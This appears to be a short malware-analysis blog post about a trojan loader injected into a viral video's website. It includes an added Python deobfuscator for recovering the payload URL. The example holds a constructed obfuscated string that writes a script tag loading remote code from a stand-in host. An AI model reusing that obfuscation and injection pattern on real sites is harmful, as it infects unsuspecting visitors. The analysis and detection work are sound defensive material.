…well actually it’s a trojan, but it’s still malicious!
For those who had the misfortune of watching the viral video 2 Girls 1 Cup (SFW Wikipedia link) that spread across the internet like wildfire a couple years ago, people trying to sign up to view the video on the official site will now get more than they bargained for.
As you can see, there is nothing overly complicated about the obfuscation technique: it is a simple matter of escaping certain characters and inserting a symbol at random intervals in the text. Once the code is deobfuscated, we see that another script tag is written, pointing to the domain where the payload is hosted.
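To show how an analyst would reverse the two layers described above (a filler symbol sprinkled through the text, then escaped characters), here is an added Python example. It is not code from the original post or from the detection vendor; the filler symbol `#`, the `\xHH`/`\uHHHH`/`%HH` escape forms, the sample obfuscated string and the `payload.example.invalid` domain are all constructed assumptions for illustration.

```python
import html
import re

# Assumption: the attacker's filler symbol. The post does not say which
# character was inserted, so '#' is used here purely for illustration.
FILLER = "#"


def strip_filler(obfuscated: str, filler: str = FILLER) -> str:
    """Remove the filler symbol scattered through the text.

    This must run before unescaping: the filler may land inside an escape
    sequence such as '\\x2#2', which only decodes once the '#' is gone.
    """
    return obfuscated.replace(filler, "")


def unescape_js(text: str) -> str:
    """Decode escape forms commonly seen in injected script text (assumed forms)."""
    text = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"\\u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)
    return html.unescape(text)


def deobfuscate(obfuscated: str, filler: str = FILLER) -> str:
    """Apply both layers in the right order: strip filler, then unescape."""
    return unescape_js(strip_filler(obfuscated, filler))


# Pull the src of any <script> tag out of the decoded text so the payload
# host can be blocked and hunted for in proxy logs.
SCRIPT_SRC_RE = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE
)


def extract_script_urls(decoded: str) -> list:
    return SCRIPT_SRC_RE.findall(decoded)


# Constructed sample (not from the real site): a document.write() of a
# script tag, with '<', '>' and '"' escaped as \x3c, \x3e, \x22 and '#'
# inserted at arbitrary positions, including inside escape sequences.
SAMPLE = (
    "doc#ument.wri#te(\"\\x3c#scr#ipt src=\\x2#2ht#tp://pay#load.exa#mple.inv#alid/"
    "ld.js\\x22\\x3#e\\x3c/scri#pt\\x3e\");"
)


if __name__ == "__main__":
    decoded = deobfuscate(SAMPLE)
    print(decoded)
    print("payload hosts:", extract_script_urls(decoded))
```

Running the script prints the decoded `document.write` call and the single payload URL it injects; feeding the real page source through the same two steps is how the script target URL in the post would be recovered for blocking.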
At the time of writing, the payload is no longer on the site, but we suspect it will reappear sometime in the near future.
Earlier in the week we detected a file at the script target URL as Troj/SWFLdr-A, but that file is no longer available.